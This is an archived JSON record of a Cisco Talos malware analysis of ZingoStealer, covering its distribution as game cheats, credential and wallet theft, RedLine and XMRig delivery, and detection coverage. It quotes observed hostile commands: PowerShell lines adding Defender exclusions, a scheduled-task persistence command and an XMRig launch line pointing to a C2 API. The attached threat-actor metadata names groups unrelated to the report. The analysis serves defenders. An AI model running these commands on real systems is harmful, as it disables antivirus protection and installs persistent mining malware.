{ "id": "f990ef9f-b148-49f0-b1ef-f2a164f03265", "created_at": "2026-04-06T01:28:49.696004Z", "updated_at": "2026-04-10T03:37:08.863948Z", "deleted_at": null, "sha1_hash": "aa221050b61e5da2f7212d834f0dba1725dfd339", "title": "Threat Spotlight: \"Haskers Gang\" Introduces New ZingoStealer", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3956133, "plain_text": "Threat Spotlight: \"Haskers Gang\" Introduces New ZingoStealer\r\nBy Edmund Brumaghin\r\nPublished: 2022-04-14 ยท Archived: 2026-04-06 01:23:33 UTC\r\nUpdate (04/14/22): Following the initial publication of this blog, we observed a new post in the Haskers Gang Telegram\r\nchannel announcing that ownership of the ZingoStealer project is being transferred to a new threat actor.\r\nWe also observed the malware author offering to sell the source code for ZingoStealer for $500 (negotiable).\r\nBy Edmund Brumaghin and Vanja Svajcer, with contributions from Michael Chen.\r\nCisco Talos recently observed a new information stealer, called \"ZingoStealer\" that has been released for free by a\r\nthreat actor known as \"Haskers Gang.\"\r\nThis information stealer, first introduced to the wild in March 2022, is currently undergoing active development and\r\nmultiple releases of new versions have been observed recently.\r\nThe malware leverages Telegram chat features to facilitate malware executable build delivery and data exfiltration.\r\nThe malware can exfiltrate sensitive information such as credentials, steal cryptocurrency wallet information, and\r\nmine cryptocurrency on victims' systems.\r\nWhile this stealer is freely available and can be used by multiple threat actors, we have observed a focus on infecting\r\nRussian speaking victims under the guise of game cheats, key generators and pirated software, which likely indicates\r\na current focus on home users.\r\nThe threat actor \"Haskers Gang\" uses collaborative platforms such as Telegram and Discord to distribute updates,\r\nshare tooling and otherwise coordinate activities.\r\nIn many cases, ZingoStealer also delivers additional malware such as RedLine Stealer and the XMRig\r\ncryptocurrency mining malware to victims.\r\nWhat is \"Haskers Gang?\"\r\nHaskers Gang is a crimeware-related threat actor group active since at least January 2020, consisting of a small number of\r\noriginal members. Their activity ranges from developing methods for stealing confidential information to cryptocurrency\r\nmining, remote access and development of so-called \"crypters\" to avoid detection of malware by security and antivirus\r\nsoftware.\r\nThe group operates a Telegram channel to collaborate with other members, collect logs from systems infected with\r\nZingoStealer and publish announcements related to ongoing development efforts. The group also operates a similar\r\ncollaborative Discord server where new tooling is often shared to enable members to launch more successful intrusions,\r\nimprove antivirus evasion capabilities and otherwise disseminate tactics, techniques and procedures.\r\nThese communities consist of thousands of members and demonstrate that financially motivated cybercrime is increasingly\r\nattractive to many people around the world. The core members of this crimeware group are likely located in Eastern Europe,\r\nand many of the announcements and other communications are written in Russian.\r\nIntroduction to ZingoStealer\r\nIn early March 2022, while monitoring the communications between members of Haskers Gang, we observed the\r\nannouncement of the availability of a new information stealer called \"ZingoStealer.\" This new malware was advertised as\r\nbeing freely available to members of the Haskers Gang Telegram community.\r\nhttps://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nPage 1 of 13\n\nZingoStealer release announcement.\r\nSince this announcement, we have observed a steady volume of ZingoStealer samples being uploaded to various malware\r\nrepositories.\r\nThe malware is offered in two \"tiers\" of options, with both versions of the malware precompiled and delivered via a\r\nTelegram channel.\r\nZingoStealer and exoCrypt crypter integration.\r\nFor 300 Rubles (~$3 USD), Haskers Gang also offers a pre-built option that leverages their crypter, which they refer to as\r\n\"ExoCrypt.\" This allows affiliates to take advantage of antivirus evasion without requiring them to use a third-party builder\r\nto package the malware prior to distributing it.\r\nDuring our analysis of ZingoStealer, we observed the malware author behind the stealer incorporating the XMRig\r\ncryptocurrency mining software into the stealer to further monetize their efforts by using systems infected by affiliates to\r\ngenerate Monero for the malware author.\r\nMiner release announcement sent to the channel on March 18.\r\nWhile researching ZingoStealer, we observed additional functionality, cryptocurrency theft support, and other features added\r\nfrequently, indicating that this threat will likely continue to evolve and mature over time.\r\nDistribution campaigns\r\nAs this stealer is being made available for free to members of the Haskers Gang community, it is likely being leveraged by a\r\nvariety of otherwise unrelated threat actors using various techniques to infect potential victims. We have observed a steady\r\nvolume of new samples in the wild and expect that this trend will continue. In many cases, ZingoStealer is currently being\r\ndistributed under the guise of game cheats, cracks and code generators.\r\nIn one example, the malware was being distributed under the guise of a game modification utility for \"Counter-Strike:\r\nGlobal Offensive.\" The threat actor posted a YouTube video demonstrating use of a tool purported to mod the popular video\r\ngame. The video description contained a link to the tool hosted on Google Drive.\r\nhttps://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nPage 2 of 13\n\nYouTube video description.\r\nThe hyperlink points to a password-protected RAR archive stored in Google Drive that contains an executable called\r\n\"loader.exe.\" This executable is responsible for infecting the system with ZingoStealer.\r\nGoogle Drive content.\r\nThe video itself was posted well before the initial announcement of the availability of ZingoStealer, however, the modified\r\ndate for the content hosted on Google Drive was March 22, 2022. This indicates that the hyperlinks in the video descriptions\r\nmay be updated over time at the attacker's discretion.\r\nIn many cases, the ZingoStealer executable was observed being hosted on the Discord CDN, following naming conventions\r\nsimilar to the following examples:\r\nhXXps://cdn[.]discordapp[.]com/attachments/960542241498210334/960544850158166027/2_5357301132811048430.exe\r\nhxxps://cdn[.]discordapp[.]com/attachments/960542241498210334/960542756156100708/2_5357488762752341390.exe\r\nhxxps://cdn[.]discordapp[.]com/attachments/941227101351215104/960556192931938304/loader_cheat_for_roblox.exe\r\nhxxps://cdn[.]discordapp[.]com/attachments/810482847340429352/960156304029151302/Ginzo.exe\r\nThis may indicate threat actors are also distributing the malware within gaming-related Discord servers under the guise of\r\nvideo game cheats.\r\nOther Haskers Gang campaigns\r\nIn another example, we observed a threat actor posting a YouTube video purporting to be a way to obtain free plugins for\r\nAdobe applications.\r\nhttps://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nPage 3 of 13\n\nHaskers Gang video announcement.\r\nThe video description contained a link to a supposed tool which used the Bitly URL-shortening service. When clicked, the\r\nvictim is redirected to a password-protected ZIP archive containing a malicious Windows executable hosted on the\r\nMega[.]nz file-sharing website. The executable is packed and drops the RedLine information stealer on victims' systems.\r\nThe threat actor behind this distribution campaign also invited members of the Haskers Gang Telegram channel to post\r\npositive comments in English to add legitimacy to the video and associated hyperlinks.\r\nThis is a secondary payload we've frequently observed coinciding with ZingoStealer infections. In many cases, ZingoStealer\r\nretrieves a list of URLs hosted on the C2 server as \"ginzolist.txt.\" The malware then attempts to retrieve the payloads hosted\r\nat these URLs, one of the most common being RedLine. We've also frequently observed XMRig being delivered to systems\r\ninfected with ZingoStealer.\r\nZingoStealer execution\r\nThe stealer is an obfuscated .NET executable. When executed on victim systems, it attempts to retrieve various .NET\r\ndependencies that provide core functionality used by the malware from an attacker-controlled server.\r\nThe dependencies retrieved by the malware include:\r\nBouncyCastle.Crypto\r\nDotNetZip\r\nNewtonSoft.Json\r\nSQLite.Interop (For both x86 and x64)\r\nSystem.Data.SQLite\r\n.NET component retrieval.\r\nThe retrieved DLL files are then stored in the directory from which the malware is currently running. In the case of\r\nSQLite.Interop.dll, the malware retrieves the x86 and x64 versions and creates a subdirectory for each architecture before\r\nstoring the retrieved binaries.\r\n.NET component directory.\r\nThe stealer then creates a directory structure which is used to collect and save sensitive information that is later exfiltrated to\r\nthe attacker. The location for this directory structure is:\r\nhttps://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nPage 4 of 13\n\nC:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\GinzoFolder\r\nWithin this directory, the malware creates subfolders to store various types of information that is collected by the malware.\r\nThese subdirectories include:\r\nBrowsers\r\nWallets\r\nDesktop Files\r\nZingoStealer then begins the system enumeration and data collection process, starting by taking a screenshot of the victim's\r\nsystem and storing it as a PNG called \"Screenshot.PNG\" within the directory that was created earlier.\r\nNext the malware begins to identify and collect sensitive information stored by web browsers installed on the system. This\r\nincludes saved local data, cookies, login data, etc.\r\nIt supports the major web browsers, including:\r\nGoogle Chrome\r\nMozilla Firefox\r\nOpera\r\nOpera GX\r\nDiscovered information is saved within the directory structure we described previously.\r\nThe malware also attempts to enumerate environmental and system information. This data is saved within a text file called\r\n\"system.txt\" which is also stored within the data staging directory and includes:\r\nIP address\r\nComputer name\r\nUsername\r\nOS version\r\nLocalization information\r\nProcessor information\r\nSystem memory\r\nScreen resolution\r\nStart time\r\nNext, ZingoStealer attempts to collect sensitive information, including user account tokens for collaboration software that\r\nmay be installed, including Discord and Telegram. As mentioned in our previous research related to abuse of collaboration\r\nplatforms, this information can be used to impersonate users, obtain victim account information, or otherwise abuse these\r\nplatforms and their users.\r\nZingoStealer also attempts to access information related to Chrome extensions that may be present within the victim's web\r\nbrowser. This information is gathered from the following location:\r\nC:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\\r\n\u003cCHROME_EXTENSION_ID\u003e\r\nThe malware specifically searches for extension data associated with the following cryptocurrency wallet extensions.\r\nTronLink\r\nNifty Wallet\r\nMetaMask\r\nMathWallet\r\nCoinbase Wallet\r\nBinance Wallet\r\nBrave Wallet\r\nGuarda\r\nEQUAL Wallet\r\nBitApp Wallet\r\niWallet\r\nWombat - Gaming Wallet\r\nZingoStealer then searches %APPDATA%\\Local and %APPDATA%\\Roaming for cryptocurrency wallet data associated\r\nwith the following cryptocurrencies.\r\nZcash\r\nArmory\r\nBytecoin\r\nJaxx Liberty\r\nhttps://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nPage 5 of 13\n\nExodus\r\nEthereum\r\nElectrum\r\nAtomic\r\nGuarda\r\nCoinomi\r\nIt also queries the registry (HKCU\\SOFTWARE\\\u003cVALUE\u003e) to identify settings associated with additional cryptocurrency\r\nwallets, including:\r\nBitcoin\r\nDash\r\nLitecoin\r\nAny files or directories present within the infected user's Desktop folder will also be copied to the staging directory. Any\r\ndata successfully collected throughout this process will be stored in the appropriate subdirectory within the data staging\r\ndirectory. Once the collection process has been completed, DotNetZip creates an archive containing all the information,\r\nwhich is then exfiltrated to an attacker-controlled server.\r\nData exfiltration.\r\nThe logs are then processed and delivered to the Haskers Gang Telegram channel so ZingoStealer users can access them.\r\nLog delivery via Telegram.\r\nThe malware is also used as a loader for other malware payloads.\r\nDuring the execution of the ZingoStealer payload, it retrieves the geolocation of the victim's system using freegeoip[.]app. It\r\nthen makes an HTTP GET request to the C2 server for a resource called \"cis.txt.\" An example of this can be seen below.\r\nCIS check.\r\nhttps://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nPage 6 of 13\n\nThis could be a reference to the Commonwealth of Independent States (CIS). Many financially motivated cybercriminals\r\nlocated in CIS countries actively avoid infecting systems in these countries to avoid attracting local law enforcement\r\nattention. Similar behavior is often observed, as ransomware operators often actively avoid targeting organizations located in\r\nthese countries. In one of the initial announcements related to ZingoStealer, the malware author mentioned that, while CIS\r\nfiltering is available, it is not currently in place, but it may be activated in the future based on local law enforcement\r\nattention.\r\nFollowing the geolocation check, the malware requests a list of URLs that it uses to retrieve and execute additional malware\r\npayloads, at the discretion of the attacker.\r\nSecondary payload list retrieval.\r\nThis list of URLs is saved into a text file called \"ginzolist.txt\" that is saved within the %APPDATA%\\Local directory on the\r\nvictim system. The malware then retrieves the additional malware payloads hosted at these URLs and saves them within the\r\n%APPDATA%\\Local directory. An example of this can be seen below.\r\nSecondary payload binary retrieval.\r\nIn this particular case, the binary \"sweet.exe\" was associated with RedLine Stealer and saved at C:\\Users\\\r\n\u003cUSERNAME\u003e\\AppData\\Local\\536075.exe.\r\nWhile \"antiwm.exe\" was associated with an injector for the XMRig cryptocurrency miner and saved at C:\\Users\\\r\n\u003cUSERNAME\u003e\\AppData\\Local\\209625.exe.\r\nThe retrieved binary payloads then continue the infection process.\r\nExoCrypt crypter\r\nAs previously mentioned, the malware author responsible for ZingoStealer also offers a crypter service that allows\r\nZingoStealer users to obtain encrypted ZingoStealer builds that assist with evading endpoint detection on systems. We\r\nidentified a binary loader for ZingoStealer that may be related to the use of this crypter.\r\nSample metadata.\r\nThe functionality of the code is straightforward: It is responsible for implementing a randomized sleep interval before\r\ndecrypting the contents of the ZingoStealer binary and saving the decrypted contents as %TEMP%\\ChromeHandler.exe. It\r\nthen executes the ZingoStealer binary, initiating the normal infection process previously described.\r\nhttps://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nPage 7 of 13\n\nMain() function.\r\nTo decrypt the ZingoStealer binary, it retrieves the data from a resource present within the executable called \"zvezdy\" and\r\nstores it within an array.\r\nZvezdy resource contents.\r\nIt then iterates through the array and performs a modulo operation on each of the values. Based on the results of the\r\noperation, each byte is converted into the appropriate value and stored within a second array. An example of the\r\nDecryption() function is shown below.\r\nDecryption() function.\r\nFinally, the second array is passed back to the Main() function, saved to disk as ZingoStealer, and executed to continue the\r\ninfection process.\r\nRedLine Stealer\r\nOne of the secondary payloads delivered and executed by ZingoStealer is RedLine Stealer, a well-known information stealer\r\nthat has been analyzed extensively over the past couple of years. It features significantly more support for retrieving data\r\nfrom various applications, browsers, cryptocurrency wallets and extensions.\r\nBelow is a basic comparison between the two stealers as it relates to supported applications from which the malware can\r\nretrieve sensitive data to be exfiltrated to the attacker.\r\nhttps://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nPage 8 of 13\n\nStealer feature comparison.\r\nGiven that RedLine Stealer seems to provide more capabilities, why would an adversary use ZingoStealer to deliver\r\nRedLine Stealer?\r\nBesides ZingoStealer, the malware author also offers additional services that they advertise within the Haskers Gang\r\ncommunity. One service is a \"log access service\" used to monetize information stealer logs obtained from previously\r\ninfected systems. Customers can purchase access to the log data generated from various stealers operated by the attacker,\r\nwhich provides them sensitive account information that can be further leveraged for a variety of purposes including initial\r\naccess, fraud, etc.\r\nAdvertisement for the logging service.\r\nThe malware author behind ZingoStealer assures ZingoStealer users that they do not access log data generated by\r\nZingoStealer.\r\nhttps://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nPage 9 of 13\n\nActor's assurance they do not take interest in the uploaded stolen logs.\r\nHowever, by effectively backdooring ZingoStealer and using it to deliver RedLine Stealer, they can still take advantage of\r\nthe infections achieved by ZingoStealer users. This allows them to let ZingoStealer users perform the heavy lifting in terms\r\nof malware distribution, antivirus evasion, and achieving successful infections, while they passively collect more\r\ncomprehensive logs from the systems. This also allows them to monetize the infections of all ZingoStealer users\r\nsimultaneously, maximizing profitability.\r\nThe RedLine Stealer configuration extracted from analyzed samples contained the following parameters.\r\n{\"ip\": \"193[.]38[.]235[.]228:45347\", \"xor_key\": \"Zag\", \"id\": \"keepye\"}\r\nThe value \"keepye\" stored within the ID field of the configuration matches the username associated with an individual\r\nsuspected to be behind development of ZingoStealer.\r\nThreat actor social media profile.\r\nZingoMiner (XMRig)\r\nIn addition to RedLine Stealer, ZingoStealer also delivers the XMRig cryptocurrency mining malware to victims. This is\r\nanother way the malware author behind ZingoStealer is attempting to monetize the operations of ZingoStealer users.\r\nThis was confirmed when the author of ZingoStealer published an announcement within the Haskers Gang Telegram group\r\ninforming the community that they had added XMRig to a new version of ZingoStealer as previously described.\r\nAs mentioned, the main binary payload associated with the mining malware is retrieved and executed by ZingoStealer\r\nduring the initial infection process. It is then executed using conhost.exe as shown below.\r\n\"C:\\Windows\\System32\\conhost.exe\" \"C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\209625.exe\"\r\nOnce executed, it invokes PowerShell using the EncodedCommand option, specifying Base64-encoded PowerShell\r\ncommands to execute.\r\ncmd /c powershell -EncodedCommand\r\n\"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAk\r\n\u0026 powershell -EncodedCommand\r\nhttps://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nPage 10 of 13\n\n\"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBv\r\n\u0026 exit\"\r\nThis PowerShell is responsible for creating two exclusions in the Windows Defender configuration on the system.\r\nAdd-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force\r\nAdd-MpPreference -ExclusionExtension @('exe','dll') -Force\r\nIt also attempts to achieve persistence for the miner, ensuring that it is executed following system reboots. This is\r\naccomplished by creating a new scheduled task using the following syntax:\r\nschtasks /create /f /sc onlogon /rl highest /tn \"updater\" /tr \"C:\\Users\\\r\n\u003cUSERNAME\u003e\\AppData\\Roaming\\Chrome\\updater.exe\"\r\nFinally, the malware copies itself from its initial starting location to match the path defined in the scheduled task, and then\r\nexecutes the newly created executable.\r\n\"C:\\Windows\\System32\\conhost.exe\" \"C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Roaming\\Chrome\\updater.exe\"\r\nThis executable is also responsible for creating and executing a binary located at:\r\nC:\\Users\\\u003cUSERNAME\u003e\\AppData\\Roaming\\Windows\\Telemetry\\sihost64.exe\r\nIt also creates a file at the following location:\r\nC:\\Users\\\u003cUSERNAME\u003e\\AppData\\Roaming\\Windows\\Libs\\WR64.sys\r\nFinally, it invokes explorer.exe with the following parameters.\r\nC:\\Windows\\explorer.exe shpiczjxwdufjl0\r\nXji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB7VSAkqxepfHfbYtEaV9ZbG09TvsFZSeW\r\nThis injects XMRig into the explorer.exe process and begins the cryptocurrency mining operations. The XMRig client is\r\nlaunched with the following command line parameters:\r\n\\Windows\\explorer.exe --algo=rx/0 --randomx-no-rdmsr --url=pool[.]hashvault[.]pro:80 --\r\nuser=47tAzTKZcJuCui5Bx2FPVoA7UvWoz1QvRCFF1Bpvej5yGJuPPBgqTC8NG95Q3sMwsYV34eonCD3RVSEpSdhxaPRKSiagNNi\r\n--pass= --cpu-max-threads-hint=30 --cinit-stealth-targets=\"Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe\" --cinit-api=\"hxxps://control[.]nominally[.]ru/api/endpoint.php\" --tls --cinit-idle-wait=5 --cinit-idle-cpu=90\r\nInfected systems periodically send beacon data to the API specified when XMRig was launched. These beacons are\r\nconsistent with the following example:\r\n{\"computername\":\"\u003cHOSTNAME\u003e\",\"username\":\"\u003cHOSTNAME\u003e\",\"gpu\":\"\r\n\u003cREDACTED\u003e\",\"remoteconfig\":\"\",\"type\":\"xmrig\",\"status\":4,\"uqhash\":\"\u003cREDACTED\u003e\"}\r\nInvestigating the pool address specified by the malware shows that the hash rate has continued to increase as more systems\r\nare infected with ZingoStealer, however it has not proven to be very lucrative thus far.\r\nMining Pool Statistics\r\nhttps://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nPage 11 of 13\n\nConclusion\r\nZingoStealer is a relatively new information stealer being offered for free to members of the Haskers Gang Telegram group.\r\nIt features the ability to steal sensitive information from victims and can download additional malware to infected systems.\r\nIn many cases, this includes the RedLine Stealer and an XMRig-based cryptocurrency mining malware that is internally\r\nreferred to as \"ZingoMiner.\" While the malware is new, Cisco Talos has observed that it is undergoing consistent\r\ndevelopment and improvement and that the volume of new samples being observed in the wild continues to increase as more\r\nthreat actors attempt to leverage it for nefarious purposes. In many of the distribution campaigns we have observed\r\nassociated with ZingoStealer, threat actors appear to be targeting home users and distributing their malware under the guise\r\nof video game cracks, cheats, and other similar content. Users should be aware of the threats posed by these types of\r\napplications and should ensure that they are only executing applications distributed via legitimate mechanisms.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in\r\nthis post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their\r\ncampaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense\r\nVirtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure\r\nproducts.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs,\r\nwhether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests\r\nsuspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nhttps://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nPage 12 of 13\n\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase on Snort.org.\r\nThe following Snort SIDs are applicable to this threat: 59145, 59160, 59500 and 59501.\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are\r\ninfected with this specific threat. For specific OSqueries on this threat, click here and here.\r\nIndicators of Compromise\r\nIndicators of Compromise associated with this threat can be found here.\r\nSource: https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nhttps://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html" ], "report_names": [ "haskers-gang-zingostealer.html" ], "threat_actors": [ { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775438929, "ts_updated_at": 1775792228, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/aa221050b61e5da2f7212d834f0dba1725dfd339.pdf", "text": "https://archive.orkl.eu/aa221050b61e5da2f7212d834f0dba1725dfd339.txt", "img": "https://archive.orkl.eu/aa221050b61e5da2f7212d834f0dba1725dfd339.jpg" } }